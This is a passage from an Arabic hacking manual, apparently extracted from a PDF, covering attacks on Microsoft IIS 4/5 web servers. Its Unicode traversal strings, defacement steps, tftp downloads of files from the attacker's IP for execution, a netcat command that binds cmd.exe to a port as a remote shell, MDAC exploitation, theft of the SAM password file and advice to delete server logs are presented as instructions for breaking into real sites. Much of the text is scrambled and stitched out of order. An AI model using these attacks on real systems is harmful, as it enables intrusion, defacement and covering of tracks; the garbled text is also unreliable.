.%25%35%63.%255c.....%c0%9v..vti_bin/.%255cwinnt/system32/cmd.%c1%1c.%%35c...%25%35%63..%C1%1C.%25%35%63.%C1%9C.%255c...%255cwinnt/system32/cmd.exe?/c+dir+c vti_bin/.%%35c..%255c./ \:%255cwinnt/system32/cmd./ \:%252fwinnt/system32/cmd.%c0%af.%255c...%%35%63../winnt/system32/cmd..exe?/c+dir+c \:PBServer/./winnt/system32/cmd.%255c......%252f......%%35c.%255c.exe?/c+dir+c/ \:scripts/.%c1%9c.%255c..%C1%9C...exe?/c+dir+c \:scripts/.%/ \:%35%63winnt/system32/cmd.../ \:%C0%AFwinnt/system32/cmd.%255c...%%35%63./winnt/system32/cmd..exe?/c+dir+c scripts/....%255c._/ %25%35%63..%255c.%25%35%63.%255c./winnt/system32/cmd..%255cwinnt/system32/cmd.%252f.%C1%9C.exe?/c+dir+c vti_bin/.exe?/c+dir+c Rpc/.%255c...exe?/c+dir+c/ \:scripts/.exe?/c+dir+c scripts/.%%35%63._/ \:%255c..%252f.%255c.%c0%qf.%255c.%C0%AF..exe?/c+dir+c adsamples/...%25%35%63..%C1%1C.%25%35%63..%%35%63.exe?/c+dir+c samples/.exe?/c+dir \:+c vti_bin/.%%35cwinnt/system32/cmd.%25%35%63..exe?/c+dir+c cgi-bin/.%%35c.exe?/c+dir+c/ \:PBServer/....%255c..%255c../winnt/system32/cmd.....%%35%63.exe?/c+dir+c/ \:scripts/...exe?/c+dir+c/ \:scripts/.._/ \:%255cwinnt/system32/cmd.../ \:%255cwinnt/system32/cmd..exe?/c+dir+c/ PBServer/.exe?/c+dir+c vti_cnf/.exe?/c+dir+c/ \:scripts/.%255c.%_/ \:%35%63.exe?/c+dir+c/ \:Rpc/.%C1%1C..%255c../ \:%C1%9Cwinnt/system32/cmd./winnt/system32/cmd.%252f.%25%35%63.%25%35%63winnt/system32/cmd..%%35c./ \:%C1%1Cwinnt/system32/cmd.exe?/c+dir+c/ 131 .exe?/c+dir \:+c \:Rpc/./winnt/system32/cmd..%C0%AF..../ %25%35%63...%252f.%%35%63.exe?/c+dir+c scripts/.%255c.....%/ \:%35%63winnt/system32/cmd.%252f....%255c....exe?/c+dir+c/ \:scripts/..exe?/c+dir+c PBServer/.exe?/c+dir+c vti_bin/.%255c...%252f..%25%35%63../wi \:nnt/system32/cmd.%252fwinnt/system32/cmd.%c1%8s.%255c.%252f.%25%35%63..%_/ \:%35c..exe?/c+dir+c/ \:scripts/.../ \:%255cwinnt/system32/cmd..%255c...%255c../winnt/system32/cmd./winnt/system32/cmd.%%35c...%%35cwinnt/system32/cmd..%255c._/ %25%35%63..%25%35%63winnt/system32/cmd.%%35%63....%%35c.%255c.exe?/c+dir+c/ Rpc/..%C0%AF.%255c.%255c....../ %25%35%63.exe?/c+dir+c iisadmpwd/.....%255c./wi \:nnt/system32/cmd.%%35%63..%%35c..

...../winnt/system32/cmd...com ‫( معرفة اليونيكود بسيطه جدا يكفي ان تعرف كيف تستطيع النتقال عبر الهارديسكات وعبر الملفات‬3 ( ‫)تعمل عبر المتصفح‬ scripts]/.exe?/c+dir+c/ \:scripts/..%c0%af..exe?/c+dir+c/ \:scripts/.%c0%af._/ \:%c0%af.exe?/c+dir+c samples/../winnt/system32/cmd..%c0%af...%c0%af.exe?/c+dir+c/ \:scripts/.exe?/c+dir+c vti_bin/........\:scripts/./winnt/system32/cmd.%c0%af...%c0%qf.%c0%af.exe?/c+dir+c/ \:scripts/.%c0%af.%c0%af./winnt/system32/cmd...%c0%af./.%c0%af..%c0%af.%c0%af.exe?/c+dir+c/ \:scripts/..exe?/c+dir+c/ \:scripts/./......./winnt/system32/cmd..exe?/c+dir+c/ \:scripts/.exe?/c+dir+c iisadmpwd/..exe?/c+dir+c adsamples/../.%c1%pc.%c1%af.%e0%80%af.%c0%af././winnt/system32/cmd.%f8%80%80%80%af..exe?/c+dir+c \:scripts/....exe\?/c+dir+c cgi-bin/../winnt/system32/cmd./winnt/system32/cmd._/ \:%c0%af.\%e0\%80\%af./winnt/system32/cmd.%c0%af.../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/./ \:%c0%af.%c0%af..%c0%af.../winnt/system32/cmd............%c0%af.%c1%pc.exe?/c+dir+C C:\ ‫لقرائه ما بداخل هارديسك‬ scripts]/../winnt/system32/cmd...../winnt/system32/cmd...exe?/c+dir+c ‫ من الموقع‬TFTPD ‫( بأمكانك الحصول على برنامج‬2 /http://iisbughelp.\/ \:%e0\%80\%af.%c0%af..../winnt/system32/cmd./winnt/system32/cmd.%fc%80%80%80%80%af.../winnt/system32/cmd.%c0%af.\%e0\%80\%af.%c1%9c.%c0%9v..%c0%af.%c0%af./winnt/system32/cmd..exe?/c+dir+c/ msadc/../.%c0%af.%c0%af./../ \:%c0%af.exe?/c+dir+c/ \:scripts/.%c0%af././ \:%c0%af..%c0%af.exe?/c+dir+E E:\ ‫لقرائه ما بداخل هارديسك‬ 132 .]/ \:%c0%af._/ \:%c0%af../winnt/system32/cmd..%c1%9c.exe?/c+dir+c vti_cnf/./winnt/system32/cmd./winnt/system32/cmd.%c0%af../winnt/system32/cmd..%c0%af...4t.%c1%8s.%c0%af./winnt/system32/cmd./.exe?/c+dir+c/ \:scripts.%c0%af.exe?/c+dir+c/ msadc/.%c0%af../winnt/system32/cmd./...%c0%af.......]/ \:%c0%af./winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..exe?/c+dir+c/ \:scripts/.../winnt/system32/cmd.../ \:%c0%af./.%c1%1c..%c0%af.exe?/c+dir+D D:\ ‫لقرائه ما بداخل هارديسك‬ scripts]/./ \:%c0%af././..%c0%af.%c0%af..]/ \:%c0%af../winnt/system32/cmd...%f0%80%80%af.%c0%af..exe?/c+dir+c vti_bin/.

‫نقوم بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب )) اغلب‬ ‫ثغرات اليونيكود تنطلق من هذه المجلدات ((‬ ‫‪(1‬مثال المجلد ‪msadc‬‬ ‫‪msadc/.%c0%af..htm‬‬ ‫طبعا سنرسل المر عبر ثغرة اليونيكود من المتصفح لديك وسنقوم بتغيير الداله ‪ c+dir‬الى الداله ‪c+ren‬‬ ‫)) عليك ان تعرف ان الوامر التي سوتضع هي نفس الوامر الموجوده في ‪ Dos‬وفي ‪Command‬‬ ‫‪ Prompt‬فعليك ان تكون عارفا بما هو المر المراد استخدامه‬ ‫المهم ستكتب الثغره هكذا ‪:‬‬ ‫‪133‬‬ .%c0%af....htm‬‬ ‫‪main././..exe?/c+dir+c‬‬ ‫وأردنا الولوج الى هذا الملف لنرى ما به فسنكتب الثغره هكذا ‪:‬‬ ‫‪msadc/..asp‬‬ ‫‪main...././../..../../...asp‬‬ ‫‪default./‬‬ ‫‪\:%c0%af.exe?/c+dir+C‬‬ ‫‪ (2‬مثال المجلد _‪vti_bin‬‬ ‫‪vti_bin/./winnt/system32/cmd.%c0%af..%c0%af..../‬‬ ‫‪%c0%af.%c0%af.exe?/c+dir+C‬‬ ‫في سيرفرات ‪ IIS‬عند تركيبها )) بشكل عادي (( يكون المجلد الرئيسي للويب تحت اسم معين وهو ‪:‬‬ ‫‪C:\Inetpub\wwwroot‬‬ ‫او في المجلد‬ ‫‪D:\Inetpub\wwwroot‬‬ ‫او في المجلد‬ ‫‪E:\Inetpub\wwwroot‬‬ ‫في العاده يكون في الهارديسك ‪ C‬ولذلك سأكمل شرحي على انه هناك‬ ‫ستجد في هذا المجلد عادة جميع المواقع التي على السيرفر‬ ‫فلو وجدنا ثغرة يونيكود ما ولتكن‬ ‫‪msadc/.%c0%af.%c0%af..exe?/c+dir+C:\Inetpub\wwwroot‬‬ ‫اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ) ستجدها في مجلدات بداخل مجلد الـ‬ ‫‪ ( wwwroot‬اما لو كان السيرفر عباره‬ ‫عن موقع واحد فقط فستجد كافة الملفات في مجلد الـ ‪ wwwroot‬نفسه‬ ‫في اغلب الظن يقوم الهاكر بتغيير الصفحة الرئيسيه الولى وعليك ان تعلم انه ليس دائما الصفحة الرئيسيه‬ ‫الولى تحمل اسم ‪index..htm‬الى اي اسم اخر يخطر ببالك وليكن ‪ss.htm‬‬ ‫‪index.htm‬‬ ‫‪default.htm‬‬ ‫هناك عدة تسميات وأختصارات لها وهذه بعضها )) معظمها ((‬ ‫‪index../‬‬ ‫‪\:%c0%af./winnt/system32/cmd../winnt/system32/cmd.htm‬فكيف‬ ‫سنقوم بتغييرها وهو ما يهمنا تقريبا من عملية‬ ‫الختراق هذه‬ ‫سنقوم اول بتغيير اسم الملف من ‪ index._/‬‬ ‫‪\:%c0%af./.asp‬‬ ‫لنفرض الن اننا وجدنا ان الصفحة الرئيسيه للموقع في مجلدنا ‪ wwwroot‬هي ‪ index./winnt/system32/cmd.%c0%af.

%c0%af..htm‬‬ ‫وقم بالتصال مع الموقع عبر ثغرة اليونيكود المضاف اليها هذه التوليفه ليصبح في النهايه على هذا النحو ‪:‬‬ ‫‪msadc/.XXX.htm‬‬ ‫‪C:\inetpub\wwwroot\index.%c1%9c.XXX+GET+index./winnt/system32/cmd.XXX.exe?/c+ren+C:\Inetpub\wwwroot\index././..XXX.htm+C:\Inetpub\wwwroot\index.XXX./‬‬ ‫"‪%c1%9c..%c1%9c..‫‪msadc/../winnt/system32/cmd.exe?/c+tftp.XXX get index.htm‬‬ ‫ارأيتم كم هو سهل ‪ (:‬؟‬ ‫‪A‬يبدو انك ايها المخترق لم تكتفي باغلق الصفحة الرئيسيه للموقع فانت تريد ان تضع صفحة بموضوع اخر‬ ‫وليكن الموضوع هو‬ ‫‪!!!Hacked‬‬ ‫فكيف سنرسلها في صفحة ‪ index.XXX./..htm‬الى ‪ss..htm‬؟؟‬ ‫هناك عدة طرق ومنها سأذكر هذه الطريقه وهي عبر التصال بمنفذ ‪ TFTP‬الذي ستكون فيه انت في وضع‬ ‫السيرفر والموقع الذي امامك‬ ‫في وضع الكلينت‬ ‫كيف سيتم هذا ؟‬ ‫اول قم بتركيب نظام سيرفر ‪ TFTP‬على جهازك ) البرنامج المذكور في اول الموضوع من افضل البرامج‬ ‫وهناك برنامج اخر اكثر احترافا ولكن هذا يكفي (‬ ‫الن ضع السيرفر الرئيسي في \‪ C:‬لديك‬ ‫قم بتصميم صفحة خفيفه وسريعه وسمها ‪ index.exe+‬‬‫‪i"+XXX..XXX.htm‬‬ ‫ياللروعه لقد تجاوزنا العقبه بالفعل ‪(:‬‬ ‫الن قم بتشغيل سيرفر الـ ‪ TFTP‬وقم بتجهيز ملف الـ ‪index.exe -i XXX.htm‬‬ ‫)) ‪ XXX.exe+‬‬‫‪i"+XXX.XXX.htm‬‬ ‫وهكذا فقد تم تغيير اسم الصفحة من ‪ index./.htm‬ليضعه في جهازه في المجلد‬ ‫‪wwwroot‬‬ ‫ولكن ل تنسى فشكل توليفة الوامر يختلف من الوضع العادي عن وضع اليونيكود‬ ‫فما هو الحل ؟‬ ‫الحل هو ان تحول توليفة المر الى يونيكود لتضعه في الثغره التي لديك‬ ‫بعد تحويل المر الى يونيكود سيصبح شكله كالتالي ‪:‬‬ ‫"‪tftp./‬‬ ‫‪%c0%af.htm‬وضعها في \‪C:‬‬ ‫الن نريد ان نرسل للسيرفر الملف الجديد من \‪ C:‬لدينا الى ملف‬ ‫‪C:\inetpub\wwwroot‬‬ ‫ل ليس المر صعبا ففي نظم ميكروسوفت يوجد امر )) هو بالصح برنامجا منفصل (( يحمل اسم ‪TFTP‬‬ ‫وهو عباره عن كلينت بسيط يستخدم‬ ‫بروتوكول ‪ TFTP‬وهو بروتوكول بسيط جدا جدا )) يسميه البعض البروتوكول التافه (( يقوم بسحب او‬ ‫ارسال الملفات من والى الجهاز‬ ‫نحن نريد ان يسحب ملفا من جهازنا فكيف لنا ذلك ؟‬ ‫طبعا لو كنا في غير اليونيكود لكتبنا توليفة المر التالي ‪:‬‬ ‫‪tftp.ht‬‬ ‫‪m+ss.htm‬‬ ‫وهكذا قمنا بتحميل الصفحة الى النترنت وانتيهنا من عملية الختراق )) تقريبا ‪(( (:‬‬ ‫ملحوظه ‪ :‬يمكنك ان تقوم بتحميل ملفات ‪ EXE‬ايضا وتشغيلها على السيرفر بنفس السلوب وهذا مثال ‪:‬‬ ‫‪134‬‬ ....XXX‬تعني اي بي السيرفر المراد سحب الملف منه ((‬ ‫في توليفة هذا المر يقوم الكلينت بطلب الملف المسمى ‪ index.XXX..XXX+GET+index.htm+C:\Inetpub\wwwroot\index.%c0%af.

./winnt/system32/cmd./winnt/system32/cmd.%c1%9c./.‫لنفرض اننا نريد تحميل ملف ‪ EXE‬على السيرفر وسميناه ‪ hunter.log‬‬ ‫وسيكون ذلك عن طريق هذا المر ‪:‬‬ ‫‪msadc/..././.exe‬‬ ‫بعد ان يتم تحميل الملف سنشغله عبر تنفيذ هذا المر‬ ‫‪msadc/..XXX...exe?/c+tftp.log/s‬‬ ‫هناك انواع اخرى من الملفات يتم تخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذات‬ ‫المتداد ‪tmp‬‬ ‫وهذا امر مسحها عبر اليونيكود ‪:‬‬ ‫‪msadc/../..htm‬ونضعه في \‪ C:‬للسيرفر عبر هذه التوليفه‬ ‫‪:‬‬ ‫‪msadc/.tmp/s‬‬ ‫ايضا ملحوظه مهمه وهي ان ل تبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او‬ ‫ايميلتهم الحقيقيه قم بمسح اي شيء يدل عليك‬ ‫او على عملية الختراق )) حاول ان تصل الى هذا المستوى ((‬ ‫هناك عدد من الشياء والفكار لن اتطرق اليها مثل ارسال فايروس ما او امر على ملف ‪ bat‬حتى تتمكن من‬ ‫وضع مشكله كبيره في السيرفر لكي ل يعمل‬ ‫او ان ترسل فايروس يقوم بمحو جميع ملفات النظام او ان تمرز نفسك لديهم في السيرفر عن طريق برامج‬ ‫التحكم عن بعد و اخفائها بشكل جيد‬ ‫في المجلدات ذات الملفات الكثير )) مثل ‪ (( system32‬والكثير الكثير‬ ‫______________________________________________________________‬ ‫__________________‬ ‫ملحوظات ‪ :‬لن تعمل هذه الثغره في كل الحالت فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن‬ ‫طريق مسح ملف ‪ tftp‬من سيرفراتهم‬ ‫)) الملف المسؤول عن ذلك موجود في المجلد ‪ (( system32‬وبعض السيرفرات قامت بعملية الترقيع‬ ‫)) اصدرت ميكروسوفت ترقيعا لهذه الثغره ((‬ ‫وبعضهم قد يكون واضع فاير وول يقوم بمراقبة الباكيج الصادر والوارد وقد يقوم بعمل اصطياد لمثل هذه‬ ‫العمليات‬ ‫واخرون يقومون بتركيب برنامج الحمايه القوي جدا في نظم ‪ IIS‬ال وهو ‪ Secure IIS‬من شركة ‪Eeye‬‬ ‫والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع )) قبل حوالي اربعة اشهر (( كان ما يقارب ‪%90‬‬ ‫من السيرفرات التي فيها نظام ‪IIS‬‬ ‫تحوي هذه الثغره وبدون ترقيع )) لعدم وجوده وقتها (( او لهمال المدير‪......../..XXX./winnt/system32/cmd.../.%c1%9c.exe+‬‬‫‪i"+XXX.‬‬ ‫انتهى‪،،،‬‬ ‫‪135‬‬ ./‬‬ ‫"‪%c1%9c.exe+C:\hunter.%c1%9c...%c0%af.%c1%9c./hunter..%c1%9c.exe?/c+hunter.%c0%af./winnt/system32/cmd.exe?/c+del+C:\*./‬‬ ‫‪%c0%af...XXX+GET+hunter.exe‬ونريد تشغيله فكيف لنا ذلك ؟‬ ‫سنتبع التي ‪:‬‬ ‫نقوم بتحميل الملف على السيرفر كما قمنا بتحميل ‪ index...exe/‬‬ ‫او عن طريق هذا المر‬ ‫‪msadc/.%c0%af.%c1%9c./‬‬ ‫‪%c0%af.%c1%9c./..exe‬‬ ‫الن وقد قاربنا على النتهاء بقي لدينا في السيرفر عمل واحد فقط ال وهو مسح ملفات اللوج ‪*.exe?/c+del+C:\*.././..../‬‬ ‫‪%c1%9c.%c0%af./.

com‬‬ ‫‪ -3‬ويب سيرفر )اي نوع( اباتشي او ‪..0‬و ‪ IIS5. IIS‬‬ ‫‪#########################‬‬ ‫‪#########################‬‬ ‫‪#########################‬‬ ‫‪###########‬‬ ‫‪# Game Starts !#‬‬ ‫‪###########‬‬ ‫‪---------------‬‬‫‪136‬‬ .‬‬ ‫‪------------‬‬‫المتطلبات ‪.net/rfp‬‬ ‫‪ -2‬اكتيف بيرل لتشغيل ملفات البيرل ) يمكنك تنزيله من الموقع ‪:‬‬ ‫‪( /http://www..:‬‬ ‫‪------------‬‬‫‪ CGI-Scanner -1‬جيد ‪ .:‬‬ ‫‪--------‬‬‫معظم الطرق الموجودة هنا تعمل على سيرفرات ‪ IIS4.‬‬ ‫ويعلم الجميع مدى ضعف الناحية المنية لهذه السيرفرات ‪ .wiretrip..0‬وجميعها تعتمد على البورت ‪)) 80‬يعني‬ ‫من خلل المتصفح(( ‪.‬‬ ‫‪--------‬‬‫ملحظة ‪.‬أنا افضل ‪) Whisker‬يمكنك تنزيله من هذا الموقع ‪:‬‬ ‫‪( www.‫" الدليل الكامل لختراق سيرفر ‪" IIS‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة<‬ ‫>ةةةةةة‪< DEMON :‬‬ ‫‪--------‬‬‫مقدمة ‪.:‬‬ ‫‪--------‬‬‫يعلم الجميع مدى انتشار سيرفرات ‪ IIS‬حيث تشكل النسبة الكبر المستخدمة في تشغيل مواقع النترنت ‪..‬لذا قررت القيام بجمع اشهر ثغرات هذا النوع مع‬ ‫توضيح كيفية عملها ‪.activestate.

‬‬ ‫‪do you want me to explain what to do next.pl )) v‬‬ ‫‪c:\> mdac.exe http://www..‬‬ ‫بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع ‪www.target.‬‬ ‫تسمح لك هذه الثغرة بتشغيل اوامرك على النظام الهدف بشكل محلي ‪ .exe‬من الموقع ‪.com‬وستجد امامك ‪eGG SheLL‬‬ ‫ملحظة ‪ :‬تعمل هذه الثغرة على سيرفرات ‪ IIS4.exe‬وضعها في الدليل الرئيسي للويب سيرفر لديك )في اباتشي ‪ (Htdocs‬وفي ‪IIS‬‬ ‫الدليل ‪. /http://www. 80‬‬ ‫وهذا سيعطيك سطر اوامر ‪ cmde.exe‬‬ ‫‪---------------‬‬‫اكتشف خبراء المن في شركة ‪ eEye‬ثغرة امنية تسمح لك بتحميل نسخه ذكية من ‪ nc..msadc2..hehe.host.wiretrip.com/ 80 your_IP/ncx.com‬‬ ‫‪Please type the NT commandline you want to run (cmd /c assumed):\n‬‬ ‫‪cmd /c‬‬ ‫إذا اردت تغيير الصفحه الرئيسية ما عليك ال تنفيذ المر ‪echo hacked by me hehe > :‬‬ ‫‪C:\inetpub\wwwroot\index.‬‬ ‫‪----------------‬‬‫‪-: MDAC = RDS‬‬ ‫‪----------------‬‬‫اعتقد انها ثغرة قديمة قليل )لكني ما زلت ارى ان ‪ %40‬من المواقع تعاني منها ‪..exe‬بواسطة هذا المر ‪:‬‬ ‫‪systemroot%&&tftp -i YourIP GET nc.exe‬مع امتيازات ‪..asp & Showcode..exe‬‬ ‫وبعد اتمام الخطوة السابقة بنجاح ‪:‬‬ ‫‪ /c:\>nc http://www.exe&&del ftptmp&& attrib -r%‬‬ ‫‪nc.net/rfp :‬‬ ‫‪(( mdac.exe‬‬ ‫)) قم بقراءة المر من اليسار الى اليمين لتتمكن من قراءته جيدا ((‬ ‫بعدها قم بالتصال بالنظام الهدف على المنفذ ‪ 80‬وستجد سطر اوامر مع امتيازات ‪..technotronic.exe&&nc.‫‪.0‬فقط ))اذا لم يتم تركيب الرقعه(( ‪.com‬‬ ‫ويجب تشغيل ويب سيرفر في جهازك قبل تنفيذ الثغرة ‪.htm‬‬ ‫وإذا أردنا احكام السيطرة على الموقع بامكاننا تحميل ‪ Hacker's Swiss knife Army‬اقصد‬ ‫‪ Nc.exe -l -p 80 -t -e cmd.‬على العموم اذا اردت معرفة اذا ما كان النظام مصابا بهذه الثغرة‬ ‫ام ل ‪. Administrator‬‬ ‫بامكانك انزال ‪ NC.target.pl ..‬‬ ‫قم اول بالتصال بالنظام الهدف ‪ c:\>nc -nw -w 2 http://www.com/ 80 :‬ثم قم بارسال‬ ‫المر ‪GET /msadc/msadcs.. hey common you must be‬‬ ‫‪kidding‬‬ ‫‪.pl -h host...: IIS Hack. Administrator‬‬ ‫‪-------------------------------------‬‬‫‪-: Codebrws. wwwroot‬‬ ‫ثم قم بتشغيل ‪: IISHack.dll HTTP :‬‬ ‫فإذا كان الرد ‪ application/x_varg :‬فهذا يعني ان النظام مصاب )) اذا لم يتم ترقيعه (( ‪.exe‬و ‪ IIS Hack.asp‬‬ ‫‪-------------------------------------‬‬‫الملفان عبارة عن قاريء ملفات ‪ ASP‬يأتي مع ‪ IIS‬ولكنه ل يأتي محمل افتراضيا بل يجب على مدير النظام‬ ‫‪137‬‬ .‬‬ ‫قم بنسخ اداة ‪ nc.exe‬وجعلها تنصت‬ ‫على المنفذ ‪.‬سيتم تشغيل وامرك بصفتك مستخدم‬ ‫‪ SYSTEM‬اي بصلحيات مدير النظام ‪ .exe‬‬ ‫‪c:\>iishack..

‬‬ ‫‪-------------‬‬‫‪.victim.asp::‬‬ ‫‪$DATA‬‬ ‫‪-----------------‬‬‫‪.: webhits...victim.htw‬باحد هذه الملحقات ‪ ...com/null...htw‬‬ ‫‪isssamples/exair/search/qfullhit.htw :‬‬ ‫فإذا كان الرد بهذه العبارة ‪ format of the QUERY_STRING is invalid :‬فهذا يعني ان النظام‬ ‫الهدف مصاب بنسبة ‪...htw?CiWe.‬‬ ‫باختصار تسمح لك برؤية السورس كود لي ملف ‪.asp‬‬ ‫‪---------------------‬‬‫‪.‬لذا سأكتفي فقط بطريقة الستفادة منها ‪..com/blabla.: Null.0‬‬ ‫ومهمتها عرض السورس كود لي صفحه )) البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ ((‬ ‫الجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل ‪Global.victim.: ASP dot bug‬‬ ‫‪-----------------‬‬‫ربما اقدم ثغرة في هذا النص هي هذه الثغرة حيث تقوم ايضا بعرض السورس كود الخاص بأي صفحه ‪.HiliteType=full :‬‬ ‫سيعرض لك هذا الرابط السورس كود الخاص بالصفحه ‪. IIS4.‬‬ ‫فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف ‪)) asp.http://www. ASP‬‬ ‫لتنفيذ الثغرة ‪http://www.0‬والن تعمل على‬ ‫بعض سيرفرات ‪. %90‬‬ ‫اخيرا جرب تنفيذ الثغرة بهذه الطريقة ‪:‬‬ ‫‪www.dll & . 1998‬وهي مخصصة بالتحديد لسيرفرات ‪ IIS3.htw‬‬ ‫‪iissamples/issamples/oop/qsumrhit..‬‬ ‫‪138‬‬ .victim.‬‬ ‫باستخدام هذا المر ستحصل على ملف السام )) اذا كان النظام مصابا (( ‪:‬‬ ‫‪_. LC3‬‬ ‫‪-----------------------------------------------‬‬‫]‪-: ASP Alternate Data Streams [::$DATA‬‬ ‫‪-----------------------------------------------‬‬‫هذه الثغرة كانت بدايتها منذ العام ‪ .‬وبالتأكيد سيعمل احدها ‪:‬‬ ‫‪iissamples/issamples/oop/qfullhit.victim.0‬سيتم‬ ‫كسرها في اقل من ‪ 24‬ساعه ( ‪.htw‬‬ ‫‪---------------------‬‬‫اول قم بتجربة اللنك على النظام الهدف ‪http://www.asa‬‬ ‫يمكن تنفيذ الثغرة من المتصفح بواسطة هذا المر ‪http://www.com/default.hilitetype=full‬‬ ‫مع تغيير الـ ‪ XXXXX/XXXXX/XXXX/XXX.‬اعني رؤية‬ ‫المصدر(( ‪.com/msadc/samples.htw‬‬ ‫وبالتالي ستحصل على ملف السام قم بكسره بواسطه الداة ‪..... Default.. Expand it & Crack it‬باستخدام الداة المفضلة لدي ‪) LC3.htw‬‬ ‫‪-----------‬‬‫عملية شرح كيفية عمل هذه الثغرة معقد قليل ‪ .com/xxxxxxxxx/xxxxxxxx/x.‫تفعيله ‪.nt/repair/sam‬‬ ‫بعد الحصول على ملف السام ‪ .htw‬‬ ‫‪isssamples/exair/search/qsumrhit.

com/global..‬‬ ‫الملف المسؤوول عن هذا الخطأ هو ‪ ISM.asa%20(. PASS Database‬‬ ‫الثغرة ‪http://www...asa+.‬لذا يجب اعادة‬ ‫تحميل الملف في الذاكرة مره اخرى ‪ .: ISM.‬اي بمعنى اخر يجب ان يقوم مدير النظام الهدف بعمل اعادة تشغيل‬ ‫‪ Rebot‬او ‪.com/adsamples/config/site.victim. %20‬‬ ‫هذا الخطأ يعمل على سيرفرات ‪ .‬‬ ‫وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما ‪ . IIS3..csc :‬‬ ‫سيقوم المهاجم بانزال الملف المذكور ‪ ..dll‬عن العمل في الذاكرة بينما تطلب الثغرة ان يكون الملف المذكور قيد العمل ‪ .0‬‬ ‫‪-----------------------------------‬‬‫‪.. Space‬‬ ‫يمكن تنفيذ الثغرة بهذا الشكل ‪:‬‬ ‫‪http://www. UID and‬‬ ‫‪.<=230)global..dll‬حيث يتم تحميله بعدد كبير من الرموز المسافة )‪( 20%‬‬ ‫‪.‬وسيحصل على معلومات قيمة و هامة أيضا ‪.DLL Buffer Truncation‬‬ ‫‪-----------------------------------‬‬‫خطأ برمجي يسمح للمهاجم بسحب الملفات ورؤوية السورس كود ايضا ‪. ASP‬‬ ‫يمكن استخدامها بهذا الشكل ‪:‬‬ ‫‪http://www.‬وفي الحقيقة نحن نقوم بطلب ملف‬ ‫اخر ‪. 1997‬‬ ‫ويتم تنفيذها من المتصفح بهذا الشكل ‪:‬‬ ‫‪ http://www.com/sample.‬ويعود السبب في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف‬ ‫‪ ISM.victim. IIS 4..0&5.victim.htr‬‬ ‫مكان الـ ‪ <=230‬نقوم بوضع ‪ 230‬مسافة بهذا الشكل ‪.: site.0‬ولكن ل يمكن تجربتها على السيرفر اكثر من مره ال اذا‬ ‫قام بتسجيل خروج وتسجيل دخول ‪ .‬لحظ النقطة الموجودة في اخر السطر‬ ‫وهي فقط تعمل على سيرفرات ‪.+‬‬ ‫‪--------‬‬‫هذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات ‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪139‬‬ .asa..asp.csc‬‬ ‫‪-----------‬‬‫تمكنك هذه الثغرة من معرفة معلومات مهمة عن الـ ‪ DNS‬الخاص بالموقع بما في ذلك ‪DSN.com/global..‫حيث تم اكتشافها في العام ‪.htr‬‬ ‫‪------------‬‬‫‪..victim.. Logout & Login‬‬ ‫‪---------‬‬‫‪-: htr.

/scripts/‬و هذا الفولدر لديه امتيازات تنفيذيه على السرفر )اى يمكن لليوزر تنفيذ اى امر على الوب‬ ‫سرفر من خلله ( وهذا الفولدر ايضا هو المستخدم فى تنفيذ سكربتس ال ‪ cgi‬الموجوده على الوب سرفر و‬ ‫‪140‬‬ ..‫"دراسة مفصلة وبعمق في الـ ‪"UniCode‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<Dark Devil :‬‬ ‫السلم عليكم ورحمه ال و بركاته ‪::‬‬ ‫ازيكم شباب ايه اخباركم كلكم ؟ اتمنى تكونوا بخيرو‪.exe?/c+dir+c‬ثغره يونى كود‬ ‫‪ <==== /http://iisserver‬سيكون هذا هو هدفنا اى الموقع المصاب بالثغره المذكروه‬ ‫* ‪ .‬‬ ‫اعذرونى على غيبتى و انقطاعى عنكم و لكن و ال ظروف رهيبه‬ ‫و الن خلونا نرغى فى شويه كلم فاضى على رأى بروكن‬ ‫كنت اتصفح النترنت و ادعبث شوى و بعدين جمعت بعض من المعلومات من ملفات مختلفه و هى تتحدث‬ ‫عن اليونى كود )طبعا الن معظمكم سيستعجل و يقول ياه ه ه ه ه يونى كود قديمه ‪.%5c..md....%.‬الخ ( و لكن انا اقوله‬ ‫اصبر لقد ذكرت اليونى كود فى المنتديات ثلث مرات مره عن الصديق بلك هنتر و مره من الخ هكس و‬ ‫مره عن الصديق ديمون او ابو خلود لكن هذه المره صدقونى ستكون مختلفه تمام الختلف عن المرات‬ ‫السابقه )‪( Trust Me‬‬ ‫و الن دعونا من ها الخرابيط و خلونا نقول الدرس يمكن يعجبكم‪::‬‬ ‫اول‪:‬‬ ‫====‬ ‫متى وجدت اليونى كود؟‬ ‫‪Found On 15 May 2001 BY NSFOCUS‬‬ ‫السيستيمز التى تتأثر بالثغره هى ‪::‬‬ ‫‪All running IIS 4 / IIS 5 web server‬‬ ‫‪Windows 2k‬‬ ‫‪Windows 2k SP1 + SP2‬‬ ‫ثغره اليونى كود ‪::‬هى عباره عن ثغره تسمح للهاكر بأن يشغل اوامر بالقوه بصلحيه مسموح بها )اى يكون‬ ‫له امتياز ‪( IUSR_machinename account‬‬ ‫و تحدث هذه الثغره اصل نتيجه ان روتين ال ‪ cgi‬الموجود على الويب سرفر نفسه يفك شفره عنوان الموقع‬ ‫مرتين و هذا ما نسميه بال ‪) DeCode‬ل تقلق ستفهم بعد ذلك (‬ ‫تعالى معى خلينى اوضحلك ايه الخرابيط الى انا كاتبها فوق دى‬ ‫و ليكن مثل ‪::‬‬ ‫‪ <=== http://iisserver/scripts/...

